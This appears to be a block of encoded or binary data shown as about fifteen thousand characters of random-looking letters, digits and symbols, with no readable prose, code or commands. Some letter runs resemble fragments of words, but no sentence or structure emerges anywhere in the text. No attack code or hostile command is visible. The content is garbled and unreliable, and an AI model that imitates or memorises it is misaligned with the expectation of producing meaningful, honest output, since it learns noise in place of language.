zISdaDbA0ldg)o-3Ljgu}sOID9GFEWDI|KzX792NrAB=T*BD*M0z9X-UrH=Rmg=KnI z7N6PjMniqGd-7!WfyY~L_+-H)ZIw$a<*GbI&M--QPnle}pj_@4a86w0c7(%O&J75} zCC@`#eVLD|zqOsiSr#oMX{9XOSX!3Hd)Ax%(Qr~m_bNj^qo{~Jz~6TyCS~HEi2ji3 zU@r{KYjh=OX=rC)$Bu)gakdDC47j_W@S0c`M>8R$uOcsCXp9E8w1Ngl^vH(y#NpI9 z%O^H%ipz%uzgAnV^kUPPf8gxo6z0!%R{2!%o^^mrRL1ePOyllFH>xL&G5Yb45AQ{` zXh*|?>M>EChm09hrl|^|v@E-vcC6&#{{FX@Pu19QWtw0t@1;+nIe0JpYd(Aq4mniH zmHUa4C4cEJASWj6rS!rx`nZStX%8b#nFQ5i1s8hs9pWy}s?&Jyc&I9;4Gxd!$7tO} zhsTT+o+Zz*<0Cmh!G&JSlKh$PaH_<}W-j?a2tF;r+4bcM(1MHSeXYD#yQ*=U8bMkpuoA=GxJvCH)~VMwZW5 zPahyo!G(tk-pXa6-<9QwyrO(mCc@9SvR)mc`8YmZ9feOA6yu+Dv-@CNnK#HeqM>mo z4MQ+~qR2z;$JC5vdomAKMm4jSXSsp-V14*r${jmaS=78HOscW>F1-{f^u%eecv=33 zjB`GsJ)@5b8+>;3E`^l``z|>|?TQ&tq(AnE zDz>kshmJ?}m->ty!=WeQ9|A-#^PeGbeP((3C(z3D5WCS!dE+EIdGDU9j()kUYKaR12qZl9=$-HsR`N3{%+w0NGScl|w6+ZctDj9ja zvBy1^$1WMA&^eGEBUV^#>G^zg^_1!p#5dP5kQ9=?K4T<2()@S~gnX;%u}ksbUVhRZ5xr}UC_S5>40!aC zA)iHatE$JdTs{lGV-BI2lzZzdf5yvldZ)mA7CMy2bbOZfpLBRN+nUeBZH$lTf$`$A z$|I^Dv0y??&0+eU`3Ga1fwBC8@#E!>Qbx~JRb#2Q(et>fNZwMPYE05m0^hsxL|pRh z_;&`A??qq79U>Ame+`MoRYM|tmiiq&`OrgQkoYY0@XgqTBl_{MA1K0}4?*_qvGyzu z2Ga7GWd=bw_PDCr=>2#)Iru+%f6A;XD~}k~2!ui2OZl~9YB>GobJQM?0H4XPvraBQ z;eWzm(qQ&Jn1Jjc7(SDq`g+&C_I{$;D?Y3IaOdb*p0p8x$k)>z;q~V!w%&!#Z9UlU zUv>031ptBdaPd<~T~$}~D7~2?ExxApQknir1k-@b| zFcu|NF};(S8^xHnt=0YFu;&l6@(!QinvKsQbHu!&XXHhk&kV?PeA6j`@FzMoD>!G? z*^O@`ZVZp*j`|B6k{33B20x?r~{;>%jeVG}aEqXrFFIxD3jLKb_tkVwA~| zzi`i4 z8&PT2+pss|{+9qurljlVdtmF8jI9XdwoRwDif!o|&Hxe$8|;aFgAN6h?)y#eJi?J~r~Rss7P?#VN{QiQ!W0`@=P z;r_+t_GQ}Vkk|7|%k?03=0w-`kMi;xfWdqW75amRQ6HPpIjoH&EtuE=>_m_5*T7zZ zAn)~fUVwGC2T>uP?z6yXb9%hA*TT46hm0FN?3^Ql;0Uz&QC@y09tpd+y4 zjo7D5R_CH0urFAS7+o70=S7SD9d)p)%xJ2c%F{5w6Xk~dn|V&umZ4Cp{yt- z!uYq|sRw4mNVf;r>B!_pkM11ko32;~ z;+Y6fZF2g~{8D&ch~VpF2G6zNpX1Dn;GJ~DK7i+=nu6eb+!O0Yd>jJDE#^y%`fwW3 zP>1k;gxv(}qI3|XH9yh~D)vv0Zad1QUj59Y`;9tRX zPftpEZExL#MpTB3g9|jH?y=VeA0P9{;FDE<4nB@k2meO;^1E7OHxXQXa7>LzW`f8O zO{wz(%mKWMY#fS!Ccrf?_U5sVjcp&>KBhKE2!iI8cdmYkAW^lbsG0ec)6b&^+z(2no}U}pE2_Hb~2Fm%13s{*5!BMmR6y%K>uGhgH7 zJ(}O?z<7lSe9v;m%8y;1lqz!5Hl^YM-ezSJ)s!;M;hS) z*9<~OEQ3J)PDRYL#O^~N9WTQ^hvk1lrX}__#dayivQ8e0{sUo5^)QYZ!_cq1hy5P>7D0ERhy58C=M&2n zI}I^6B3=ifkr!UXW&)cI%*v<-mW1wn<0v=&kUwG>VDxeB#JypY(H7&-mM?qQ;fnoU zG0O2%2%N|Kw}-L4ZUXi`H5K{WOeez5u$L6`PJYf$#xT!t|N;`#kXR z6=0Mb(~|B2gg*jfTN`#M?&<5#R*Y%4AuZ=h=0_5{9~k-jrt(K@4eCZ^crPO6M{KcT zCo6Uq;?E<^_aOTpde|2fV;z~6bk727g5aO_u;+kLH_k?Ebf=BMoCkE*fsR)S;T8mr zIp08RbYBG>=Rgf!+TSVmq+)YGe+R-7p!+UjUc@p8KLhq-#LSP_caY}OP?F0%>;+)d zzuOg?i+Be@7VXyIVYlM`1jzmd#omaRw(IAp$I-aw#r{FRhW(=vG0UBY_={s*8`(Hc z>@mf*DBXO-s}RVGl|hU?C;QC9h?(EHh+mI#IhX76u#pX0UVkVa+ zyt^IPi>NrNA{Vi{f%!fFZ2|k^hoK~_FL@zGo{8aq!4@DUe+QDwLeSACy9s)^6!*MB zglPzO0Bb?aGDtTcbhP8=rVNxzPv(&X$X`bb&R}_jvhp04beAjk36Jh8 zz&H+C-AMNsFv`H>N9;{C@SBm}$zIyUz&Lk6(Gh=j=tDPOP@d;AZ9T9S2t4i4-HXam zF0TW|D@33Ss8^=rO#2Mzrb8}fcZod@?D!Q!{z-sn23gWw&P!M1rA*W~U6X60UvcSVFh0pr|; z7xlJ;z&T{S%B2m@=OEBmc^_hyLF^2KhS!05BGd}3RGy&3Px3skcL`}M?1jO!5F7L@x3)BXb(*Y37^X;&dH+P^bB>~dgS zSL^ezb>rN+!JQtqQ8Akzvk%TV#?7NwDxG1RYx>w_F!;3DFy&GY(!CWJ>q~zP)r@=* z-0t_H&4bAaTE-@LoDQiIRh9qki|{=&rCd?n;4&1*`8vcCVH<(H6PWdD(#0`!@!%5( z^ifaHw8TD%z;-&(!#;z1(zPm9i}*hgXeVCwF!mSPoxL8mQ|V3w*W~$BJfDKR=nrgC zI$~3SeF+%#krjl=kv$0diZ+gt?n%(mud(rr*mo5(8%T_HH-mP$3imAcG{hVW>Epwk zM;O^P}DUKFYin8DqGLu%{IJ zx`)vgy&H5>RX5JXyPFW`d#+VFV)r1B?sgCRsbXB`X1V0$R|sdoSz){JBF4JVr+gOy zT!yh8#F%y|V%Cjw3+oHS&Q@$LVxz+_BWwJB^{`KYhX8ix^&a+V#mqi2KVr1ohEYd2 zpX55Ol}oGx7~6xqvs_|5z__+{pNHKBemU+<^|1E?D=fyonuk3E?0GQol!rZwei|?L zIbbXU$)j?I6*E00FP}aX_7ck6;n6(`?1d#k(CcBJ19mrT#4R57-Xq=EzZdnfx(zB; z2c0wQKE;|n?BmB^9($7WlaQszWeW_!^ALQ$SH>=-`-O*%fk7e9W;a-m@xbU4nO!3` z0T}(MM>Q?Xzw}$SFKr_)Vzf2v`&T0-&ql}gB^|Mih<}B8a=rY+9`-UYu8rTNG9VrI zW=LmiSna@`L--b6vd=O?gP<-5AY}biYGr1%Ia?=7nw%+yz;3em@oW zmfv4-&$L4x#<7C7g!vd<5*X`ykB6mzaSVRi!>$1hb(eP1(%uN{ztL{jdDtDmnD#r0 zxxKkB5l5wRO zPuma7PfMTZS>#9Gq)+oB_HAI4y~&T*FfiJ+?|O7RT}isrJnT@#-sWMGfzj{!0kFdn zPDJ1}jy8cY0!R>7!){jttA_2UW>*nfw#7sQw%hA8Ad*Dm6G3$dT6fYD*uc18;E;i~ z>K*y&9owpRTwT4Rt9nP<_#JK4wF#V;tezB9^W-Y!2{B54;v9nO5{7*QII%?@_ON2l zc-SL~abC@|B$&Msv0+ar_5dmhQlZ<0cq{1ULXUVctzl0AV_NFla)f_@?tH|& zh^E4XMesv*Y@)#ntBd}kwPqN&Zh%ZH8epcTQ&(jc?UjnhwU5$I@ z_Z|o|o}bx6=J%fn%#ZTr6(U%EN8{e|yA}7$?_$L9{4P)qN-ZvyrYIAG+17qP2>(f;#dT4HU$ zIG(KZunu5c<6iG!_a9__9~~h-V$9DkgK{5D|LVMQ->dC$J}_hxgb3{j)V~B`tH;MR zKei>W5Mdeu%klI3B%ay6i}5a=-x6S!Uo+Z={GAGnSBNkTf%#2EY;=o3$NUn&;`uG` z=xSjznV&yCS$GbokHB&9WW+{yCGP15nEsLOD#h3bNk{wt8-#Il%l(bmXAqdSv#Lz@7o}r= zB7Z&|eImWj&l{9Ug3y@vaEetUr#f15SG{pla`+oJjPjgTMP)bhI?1HysynfdJi z9qW5M@{RMywRp?#4$W_W`po>^r}^DE0)OvP{%F^}fWWz10x>UQv~8TbQSW&fMw@7T zf!I?B#O_B-{)n9qUTIIy#XT=#W>3! ?Mn&jw~`7a;9p;ANR&ixFRgK>3}7m{*7} z4T0@z{eyIGL7@DYHZDK<1T2I7lRR_o*6Cr-DE2208&>Rkl|9q`-Y^uv{Fv`9yeEIG zBd-u)8Up!)3m4IS7IfrqBjPxJ)J@Cp@3?1v&mk?Z5W({MIqr?_70@xivk=Ggn*+?~ zmg42s^PSIvAHY1Ki19YHY*){k%>r4A9jX^9SZDQ3tSuER>sXg zArsQwhG)b6tQc(t`Q!LH5BD6CFVXyn%>YIjP>-25L@*hoac^m7ovJb3Gy9Ve^5NfLR+czw00k9D*Bo}29Q+n+sUelLKI`CU9h ze!lKr2qq}M1LfBOI_3v+w-0~kc>KMHin4#q_ORapV;PqMgDO zKMcAT@s1be!+KVug0!*Z?=pmG2zR0(e~#Gl`#xUseC5wIKi1&^2;+m72f?3}j@Y*q zTZ5Qsi9Lq<+fT-UD-ZiV?jHr#tyl(hr(>M{dz+iTF)gtsF-c^ZrmfwAVg?KU>og3%rdqhu0tR%-}ErrevT>sjTl8& zj1|B2=w{;n-tO`@3e2w^{7p$X-L*1!&T%k_{eNbLi}ig47_Zf><3?lsEwklj3HH#gYLiw`T!i-tH}P6Yf9 zgafrX>0UwLzQjDltOv2z5Ga@Jh?#SUV0v&R?n!qV;>*w$-#fy|6pw=OO!6OqosVZ! zSupMo-d5}G4Z8>!&vVgMSbm#;EkfE$6q|;)7YY7jM9@rgFcJ2wW?&O6S z&wO*;m3m^>yA@+w8+IQs?h`%YVINY=_Csh}iU@2E>OZd#f&5S>8xb=<(v=YQK(CrS ztPl5W4|JP-+T#kPI}`Dr5O{uViifd%L)0znVXxx;TFCmv7{;{+VqjlnK);=96!$6} z`$RKdvL5^ETcleAx@GXg=6Gq%zgi3|u2-f9O#2Y>=X#0F4XB&8USj={@n=Ctp1+BE z%8%Hiz_`9~8+bQtNU<})6EX7i5Z?1_8T&pjVzer`+9fAfpS@i(1O7B z;C^Mi9`m(a@;nbTv=Ow8%#Rq?popF8Vcm-HTO*^RjLF|l6v{Gu{sy!j)DfO#;&&B; znjbNKufz0T#650<5Mdeub?r-tSqAC22gZ8bgE(G~_X9J!&3MWDsAIfB1j~;)YjjtG zj%(DM&lolUjAi_LgfggTq+5$(FGi*I<1k1(iAc25K*@L|Zv0+Cl_I3}O zf_uvO>xiw4S5O|unO0!D{4oXYfLz3EO!+eIE$xx0M|}c8>p}j`1;+7+{e*P%UFuN= zWyLn<6(X3d8gOrP(?Q2Gvd?%J*DNWkqqPjCZAakv`#P@-?!&MFPeH`X_rs{qRz^%miDj)VBFs`KZo@t#(5qwmO;$sdECP`%;tI2HRG=z zeV2ahdZaPzt-vTh>M2Nr5Mdeub=Uei%eWhKl-1io1ThL-J7UV}KY>|(p8(yvFLY;$ z@LKrW0PKEXY;%yxcyl&xIJZiZ2p7w^40N9X9p%R|I4-emI9JQ#-pXh>+?64F&%l}1 z%J>lI<7GTd0GD3|{k3=*Uj}AnR8Mwe)Covu*mz)+)v3UkWr#2hfwHPcY;;F}jZZgT9I>R}szu?&v;@iMOR=r)3mWxNkqyo`H1x<6xl8m)hv1`{YeQ9A+UYfm)X9g<5@rM8+UnF2#m5~`^MYj!yX;K zQ)3xs|3bX8G6p<4uD!C18$68bOf2K8z~W_m&7)hYbd(>j5W)KDn{aRSI1hB>WdpD= z2qA*;(vN$iOMs5N+~r~X_KI?0zD9R8u$L}Je+7ml@@^b3&eh)K(JcYSdYlR(+)BB| zAJ?LoA8i2VRy<#4c8FM;rkw^l{6A`1euK=qy%|JS#x&5A=MBJE#uh%~<+cUoK1l2? zV4QEQz`fD&JH+pHmwjc@eH<9=xbbJ$;>~5O06NZH&+RSi6|o-xTMMii_qdgB(!PNk zj&HP6ESGdIDBZhpkK!umZc(g?864<3;s94w?STk{C-Sfk;R=LSJdjUfP!GY_K8B?f z`>z9F^Z}UPhdsKSV((R~9?#dIp7c{`XL!v+FhBKh+_PNL-3mJTq!4cfM&H%PI5v)l zf%-n^Aa+Un55)A}f23(=BVL5SIom7`Ta5b~F*qzoO!1Qrsvy1+81S)XV8Tp@zh*X%UuCW4M@&L6?OrKR0q+DnlinyMnLUk2w3Oq=z}-3g5QCGSN# zUM%Yj1n#TcP5>9NnF!o}z7w&P`yNeecHd9?RnUJ zjY#_`&~gk=Yig9$10LPez{^^74C|V)Qkwj0ZG7o@FrXW5BqFe1T$=?H_T^ zGfw7b5#!p$4Zv(YlNjqu-8}|?RJqzmr#uM*V2xJEmXQ2lx_jymk?H>vMiSuu_o}v-;{v4ll+MN z4T0m_*&fC|{S4?X_pnL8j)oJ{=V2`4dM$(eEyi;n=pKguP(e7tK$M2f>o@t2{fN@@JJR8P&H8GZ(K)|Dn z6@!QkJ5sS1J&dxX?$U0t43_mdgq_Xq8x7nF#x=l?1EZe+Qo+6sjCG?8GwcaqoOj&^ z%<_92_na60#={Or0@`t|hZx-==pXkJA^r$k28=qs$ivnEqmJL{VHW`7yp{FRNHqdtcS?Fh6RTo}g>7P&~zeGVv7+DxwI@7V)QNfP1y>>lsz$IC3I%TiGd_ofPZ*Tx{Zh@ zKtR+}vth(ICKK!N=xP+Z(ZgyL`kC<~9%5N_2d4&k9FXi_} z#N>~3zXIJuoo>ySawbMU@kwB2V~PD580EYj_i;I235@v_5L54-M8&Q~%!}B^5XcL4 z7uf_Mg7I=K?k(+ia6gQ+4v80PtKy27B?vFVXd&QdHEIhvkJ}8%; z;+|KCFb#qI{%OQaOS-+F`w;Z@Mcktp(b3zE!JGxyZ}2=;u{0E$`fav_Y5$G1l+|36 zi%7~aS-nwtnGKxZJ#wy3Ka*EI!aoo=AEvLv%P`LWiIG31y&P#D4q`2-Q#ciagC3>%tPRJO5E2pKVS~9&m&MS)MH*D!ZZZR1yz)CN%wVxNvD=xm7T5)d*+!)ME5bj4-3-j=F2wzJ>oEQz zGsCz?{WKc-8(w~V|4(4lf1`T{*m4Mkd(ejQ_igz5BDPP(a^J7mN4;`CsM!B{*e+nq z?*_!o?~O?N6}&%?zL1XVhlfvh-$^04=wAxDawagiK2d&8f{waz0WiuXL}*8#9l}r{ zGNtZjHSJq*PhN-(A>;2LzvDfO=WK|5+QS}KtQlol+OI11JrDbuVk;0E-PaZ4T7zLf z#QlpXV;vNY*f}WcI$)gVo}lF#);9tcr=xsHx6w<>H5Fq0F^qHM{bA>Uz8ZDn8WNga zE@JE}ObfQ(g?6go4sjDq7~2(|@7TV^NHmbO$V zEln$fLwk~(q=6(SoRf3_B|!nf5f!}7)(I3*!2yS>QUw)J5wFU1xL)gk6N(7l>wx0> z`>ws7y`Qy{P_OrW-@oqpban6jThFwfH4l5|<#KM#Va$EO$XBB~KI(Yf)T~Z>c?SrC zj{cqb1@njfBQF@`-JiJtd$};m6>^mHmWo2F0(F0rt|sptqGL|+HHWcANEvDsqb`BB zQ&-B+QNoOuH9~Bm?>CI~3v3y4*uM!w$1`;`y07UT`;L`7WqV6Sp;ZC<7CIfA5yKYp zRF^>4sVla;)6pFyA;?>$IDQp{Rt4ly7fkPyME8T`#kUvm)srK3v!iPh#-8#j={H{X zMX+U1m@bJetiKxF6Zh5n>X}7*8gvN5FKe8RiZI4+mkLu-lJOg3HK|L+Z=;UR#&1^& z!Fq5j(`$a)B_;gWc+|o+yvC zbki{;jQ7~?a5^rE80m%X9K}(8DI14HIWr=RCA z{0r|UU6q`Kx2k93rOxv`-fa;>{{8Y1`)IT;(1EeO2u67}3}1qEJB+mrFv^C}Js7b! zJM8xnyVYS2MeJUOeL{tfaoE!w#OS+*cM8*OGB16Xp2gl$Q853# zTldDx+7|QDZwRC8qJwgR|L)OMm%!VpD|O+Uy25*eu6$dRxf?z(><7X)>$Y__*efHQ z?I9xXy}~#*!CHgKWAB6Sd$Bfe7~dF2$6DEA*j*7DirA5oM_%7DCu?_g8_rOYCfXe8 zIlR#AAs^f&y0abjw@7!L!={UF^}fZs@bEIW{keGWcXXUpK;GW6N!20f__nU-eX8Qn zJ73S2D4z3!lox(rj4er<*#dU4=xB?r9Ri~a-6d?7?&X@myPvQ(i1+(?HXWnFs3X61 z80G3F(VZn-*oV9i>i!GD*mH!JHu5J5pOf!Yi`s{nTN9 z(mmhtYjg7cER1>CiyTHB#RuOjVbFn5{=8qVi*$>GA0*>xBe0cUMWI!JHsWYqu@AZ@ zijMO9dfm(XK-Z}&<@s7&jjj^qy;qn_O5}aa(H$M-{YIE>6M4UlbjRs>ij?v0EP2Tf zTb?1Ee0%VyfMl4xPitdVczM_6hli_-Ps#H4$-<6R;M;jO>x#|L@lNa?ME5#}^$TMT zcA&uT%*)y%FIc}Y=3vj$y>62^nAr#2MT%q&_6gln{=gnmU=C(& zEEwY@=zg!OlAh36y9OQQj`hXG5{Atu31j?6{ys_f{3;5q3goZN4WPS6bj*b)C&v3t zVdVKUg<)Ssp;Li8f0nLBw=2?FIY8czqP$ymFY<)f+5_4T_7iFUo~nD~fzg++#-(Xz zjxj!D?|0J#Sk+=o>V;;ahZ1uSNx~C1>&*^xnFmx;yrc0vZG)K1~@;)bG ztMts;&E_RV`2*__#<`sxj&8d!bTBV8`z#$V5rBR0j){hJ(2tbs@AZ!EvPkz)VOD=z z#ZS5VSfs;0Luz0Db7k>9BiI&U?_Hj~>w;dej|s!R0og3}mWo2B0%eWzZ*)6ESCOID zJM4O4?9DJIGP>7BdDEPICU3eh=+2Y;K7|j-u}{<0uwmWbA#AI|u8MTGM;-89u0VRN zEe5+rf%TmG9NlY$p@Y86bTG#tz4ZU)KeLa%%IJ284qI$&i;fQ{p!Z5$jgESTyr1YQ z_Lho*$@{79jqWzxW6L6E--m_4%RZ_u3GXu;-M1C@OYy!uV#vQl4a1y`YCokE9bgS% zoONUVp??9hvu;N_-m64c5ifOHw}Fnc5sb%&9QLz_z1#7=TnxvFm$n%Hp_lzhc< zyIqBtw9(e_t0;g|u4og@=1+)@a!*?)F@dgCSNyCb=X76=bXN$|Z9;dgqx)vmd#A8+ z{(dFW(N@szqIZez`BfB5?^4}kA9Sn%kd8s!n|+p!x}*D!=;)&;uf}_?F!s8ycG$m1 zd2bX}w(m`mj&bZCMaTI(Y~lw-zrguC>aA`A_GR7Bu2DYG3myBm@V?byk49d~9R7pO zcyH7_<-qIsk)E;7)BU%e(Xm+9PfG}6pNn(RYP121hWW7`Y$Y`i~-bZ>O>J}!*4;iovd`-H7-%g)FM4)S_s2wt#WYm9tkPj_yQZ^uON|rrW&# zrLVoYgwZF1nLOTW;7rx;9QIsc^zj>_&FDQv7`DubHZKwOIt9+$SltJ+GdEWE!Dvr8 zH$xweUa*@K;N7SzHhbPpdN#WE>Hb}!quub>Z6)lJil=_;aCAS=J?DBJir6w;XHSv7 z!&Jw0<)!}isE>tWe`nb9%!psaQ1>M_dN zdSTO|4l8TtIXdRLy%o)AB1RiNTdxY^0 z>n}^#!Ot0w9XA1XRtfu#K}Mn_=fiY_r3jAF-w|v-$og?@?jcj1Hsw zvBONq<6_#NGabhWL*5!;C+q$T9Yq@p#@hRjg{@KfGCIofl=a!T$uRPocQMxJYS@_( zv-*a-7YgGYkaHc~rIC(xa^oEpc9eAR_g4%X6UN^M;v7HN3ncGu#V>qbw!dlEZ-gxo zrXf*I#~SE4!Wfep-LHjR@a$qu8hPIX6WtNfKCtfy8x_WQ!gzlg>6Yng*pDLJf9uLm zMX}{=${5x*IX4C!W17Ph&-s<5x;LyfVto!{&t&i3jK}CWU;0#GKX!Ca7uGK9sAwNL zo)xiU9Y&pk?)?s9tpMzgx|$B&8wGn>)X~uOm*QdUbAZF{7sfc}3Bq)nj9*sjSz?m$ zi>gD=fxO>D-b;0_qLuKzLeG?E=xmJiF5P1v*aOj)Z|Q!9f~UJH(jBQQ?Kkf?TU!TK zjo4yG*CmXzm^*}FbGw2b!&yw`u!ij)u@5>7+05gArz`fMgR)DXXLB_$$}a1A^dHy^ z_H6~|J}Jz2sS98u5nCi0&S>3rXps)E3xz!-j4}o<7-z3oGg_c~YzDLSp_l63=njeU zKH#utMR^Z6Y`HMjf~GlJII}rTgCU!nqT}MoYv-K7Sck>Fm&p+H;_oYTPk(uw?)g;| zS{0aU9IvaZ(E-+_ zuu0fzT@Ax#{yxWh9Y#CF-|_f2hYjj}yLf-4E9pQUX-CJebv1cS-9z_BUDfp^bboT# z>AHuPF`>yb>;z%RJ6SZ_m43$ZpVPfzmkJ|~&J-rnmWo2F0(oRMQM|t>Qrb0!*^7nq-LwAO*7bwtI9OAG`BK8`G z-KTr<{9lwX(2z!Ar%DB;eS{P@1-|n#6g}p?WwL|cJSr~cwsO~L4 zT6IreN@XsOy&ckfc=QXr?Crec2(>v5yGI!L%lcJ0KVIzU9^NPO0plIB`S-#|?@3PY z--NMON&Xq#KKo{S^luaG zv;3gE@B_2__)ll^rK+clF+Z<(v+uHqQAP}VNyM0U8Fqy*e9s&U`zi|N`@J3Am7?Rk z-l4)o9&EAmdbU=8eRf{Y#+_g<6EFF(O}yp&*dBFIh8bgWCSjBAu@8)P`3hlIIc&2q z%J?paog8@|aM+5-dw{McZ&T!DZO$;pw9J{_=`hB$=w%(t=$Kg#pYzragbWPD)#D!fK_t%xXBU`F>@VW#(0y8oKw zaVE2jtrbRDgO~K8;~B!_#sqt1t8zkSNC<5JS7L=a(?-W6nZ7LWiwokVfRuC+|=o zkDjF~zluVu0)BnAu15E6-Ls}&bJz!U5AVx$-BY2WV7#x;z43lX_iN>-n;dql?veL# zhkZo%3?j${L)IEEj-*H&K?y(u4>b9k# zU^btjd*f{=5?ihmW@$59UgqfNH<0&pVY(#pe&OgC%Oh`^uI02%7iM~2s(bS75MB9E zmX1|mzxLyi4m-E#{+Ol3ybSCzVe~yW>K=Juj0+BFFZxih_eN}ouB5G3!M^47E@69= zF#K$oeT!wC<28(P1E%*T#q;j_mAV?n+A!EINB5zKO_w3i(Fgp8Dg|vxMfZmNP}oma zWaZef9}C0x>!W?pw<=I}{n+9G(c$|~DNeURZl|ua5ueu8^*ys({V35k|K}bo8O;3B&j3 zwLbKG-IH%%)`t%1-guXam-I3g)g?*qXC2+jNO!w1B`2Y~!_hrG(tS%Y=5I$i>{?;W-_|+o`bhUuhut8I{AIjr`PQm?e07bZd!Oj=)!T$ged4RP z>zTB9U(wE(uih_SeDynF<+M@mp+n{+3cTb0EQh^F_pcImslzUd7-Kl&C7wQ%@@E+7 z1pA4@7`L!Lv+tCm4|uaOpS=#|tHz6L#@NpnM%w68PSrhhw0TDN7UAsKERzhw-X-iN zVVi}`j=Z*K^MOc*kCkODqjQUQR*uy3=M-2&d8Mw%gYL;-l4tn=R#D*la-Y=I=-`L$ zvkrrnzXwFQGP(u2=d9Itbj9!R-J<}n)l2w}R=9e9t%)hU^l#7+4;^i+$%76II>Vk8 zv1dDMxv+mEy(=QGPw(l%%IQ5b()skR7Djrl&X5l30O`F~*K&HlC(LZ_&^_s;Y?RYG z!=(c{(hHsO(iVc*_=+`|H|m+XN_l_|?9IYxcRx_Vn3GtYf$m$8?pKZu47vv$_HALb zr;j@9N5W`37e)J!M>`2-YpP&J3uFCiSY?v*g4y~NYeHu8v7)1mz13k0g<;Em5nC+Y zgQSnPuZjnCbnhF!Wv_tlZbyI1wFR z6CHYA>v`q0?@I5viZ^-RiP*;-_Dx~<;09sjZ$+V10Ux|iSL6Lrff(S3^r5${sc#jqK zd)*t|M%|-hvEoRt=|G$&S4%}f;zRz@=bF6JMMu8T{;C)Tx=vkbb7*Ugu1j?6voDOk$CgIa!C87`SE7US zuf{tZb-Z6#xjf(K=te|GdHzJih9r}3`|vJ1brpGFoZ}{KXXsugCVEL5Kj?m?NcIf5 zH(t&!f>~Qa+|?1Y{sZjg!q`Xrq2s+q82gB<>zTaQ3S-}|%hA0qVyv|o-F3q7Gktft zJpX&7!-uyiTr9eyqdYL$8q)g~T}9ebQD{}5uHK?6I-vW80&UD6D{PAL(S0@2{Ycney00j7 zDp1yTMY=_LzE$_67a#DeD6}e&UaQm4eOAxteTVLqltkVRJ!2nqw~1!|Cl=!fusejI z<4d~NCDHL^Jsa2_yX#h1_P{8{KzBgS_7fGat0-9-AL@bU)NH@)!e^eQ=a8 z9C}Dh0#dK73e}=GI z9d?ZF`-OeQVVue0`|m$@7-y}(j#gPPdC!g*-`6&5sjyFq?&S`d(%ws7BjElafz`N4+P7Qkbwmo|HQhKc%nBKjk51?Bg^&T$F z%7N)UBGNrwbUPG&p$w#7;s>@xVY!IetLF!{Re^Qe7dXu7>L(m_iRh@mpAkmd;QgQi z@7&V=%Ji_FxjhDLEt%x=LiC_YaPaH3H~ZtFrW( z52%-hS=!jAHXW=bz{|LVl;Mx<~blJnYmZkw^J6dGra$yGU5M zP4sJcUykyABs!}Lt&)pWduROGU?bCX^My2hiDf zCTy$+c1e`SILvH*al}?c47u2~ZAoDZ*p&*bXTQPGwdfw~ujrO?=s2JM&OX_x%rNZ1 zNVm+ z_C;z_4SP+*+M*66Dg13j@~BPs{3;5TMp^6oE2eBkr#DZ-5Rn#g;;!*&RxJP$-4RK(w@Kz$n&X1wnf9p!Yp!`R=XT)o+0 z7eslV6(%>dczK_5bc`c^E#5_YjGudR@s2g7rr><_F_kA36?JI;@T86ppVLvzWZ2BHii2 z%5B6dNB4BmF^=6RgW*-P9Nzn2&GJIs^8@>w0&BFF>1uS}Q<~@-uW;B8gt2D%VTaM4 zLH99-?GnbC<<}hcGhv?>_8$)WhOlo6`<25OyRo);w=n7l_T8g^4qJ}}dq8wx^fzYn z?{xpLf?iM7Mky5~o^v9&|rcCHg0<>mQ`mwQ_( z3atv1mlx=2@~Wa^AMvoL7acDUM*d!*dtCx=r>^AhmAV@5hDi5LVU&xCg3-N8_eyrM z$M>+Fjdye8rJtr>ttc3;t*c;5cckOox^5G?4Z@IjzVM|AQ_s!zYjqpa-Ks0!m3xh@ zMz>7&C!Lf1oms-c zeu3^-1?cYA)#&uta<}OIq$~9Zx;6#qsOM(inYzcm$Gh}`!F#AM{Nj1-ToC@GJ>Bra zEFH)Ls|sV>$-QB(7Djpbj<7uxDhl|I@^Y`PMn~Jud!+X{?DfJZFGuLAOW;K|<>g3W z#=ArJtfg69fQEJ)y`R;UdQ?$pRY32Lg&FUQbdQez*0o$-_Lad#H>P;L*WTu^%OiG< z!>H%%M-56BzmpYgKdP>KlSduIf1h#K7ll1>LH2Dgqx&ymq~meAlD`!NOUEI?jP8%R zCmpBjs-`y3;Rk%R%F)rj;H##?=qu1c`$2iBD3}gAKaMQgM0CtkdduzZeCGq&M0_>o zFxCwiNBmN9%;v{S7FfIJ`1LB-*y8sA$uJuqkXOb#O}ua1sPZcezrcI4Zoog|=oUvE zy!R(K(XmQ;4Kp2l6UlV6Mjea9i(kBs#|y*H-sU$r%;fDSn@rvbl1H1(JP+&$@!ugH z*6^MaZ3g>>u%@s(9QKGX>eh^CA9T|s2kcOX&4}3H4x1y4wX_b09VqM#!oKaWqlA4x z*t?|5?3)*{I~~S6pKlZVQ5b%qjN7*f$UozKTGVlou7*8J_msbXmoE&vL>Tt9&nU3# zggqi`fhsR_r$`6mN!D`FSH_4pj55JGD|0#}FIi{ZS;AOn1vB2SMc%jRDid>F=&TP# z*UgcRwKSQX)7>Y!U5fJ`9j&8=%6fl3>{$TpnrRY zGKM;RsP6ey6hso*ze992x@U`yIxTa8uPVBBD$s5)1~9rcqGQc>mBZFXUiu}G2OY*s zA7s2sM29Wy!thH)p;dvlc#Ez^cV?t}nK0cZbXPgLWs3Zd(~G?#(z{$3>9|$*_@$y? zw%nzA)3Gx0e$8R`3gf*e@0TA4V?0DUrYPVG`+mfj!)%Q7dSRyHKJk*?Cx}s5m!#u~ z!i?@WqQhqP3d(J^^<|`OnmVSnvhO*26ugf{Ue;}O8+2HDr#reC;zb8@l5(5PKBn37 z$0(2Y{8jA|d90Hg-9s9i^6f0ZBYuH7)XRdaGt};KFtC2@W*U&wG5AoLyd#~=9Z`qm_Iw&Xfzh8HB?4!WDPzp>Q z*g@h2qrEy(;aKr8M{FC}MUl_h>zztx*2EiG9LYGbdl+g)aD6*p&`z>YjH|o)`5(w^e~P?lECfpR94e z#L-=>IM(2qkJ5&nsPK>iYw*WJo00c21>S+N_a?wzp@5E8s(@40;QgKg>*%i*W;VY; z7~eCpwQzV}r-0r?GH!3(d%bmh7}NXaNcX&H+D|Rfy+s&wrwFIwF}7H$+cIWt6LeEV z$KLU2j?S><4%yvs#T`SZNA6&`~Z%y{QS-Yaya z{24EFvr8DZfEh1iee|-=PF*!#=-3nS81lg2JxjE&Rt7ST6`W(Q5k@<1{X#`?#M6$G zU&i|m(N$Kpv}|(NhlJ6_UMCFyRTMfE7?)5UjQ5kGW9;}1VJb4gmVT8L#s^hL_pedj zZ25||siI)=Y!8=od_i=K1(u4=bi6+Dt`oLbiI;VLqkD_!u!VV{VP6);Sy-*5ySf_lNYJrF!*J(RDj)ZN#XbruU}E`yyd- 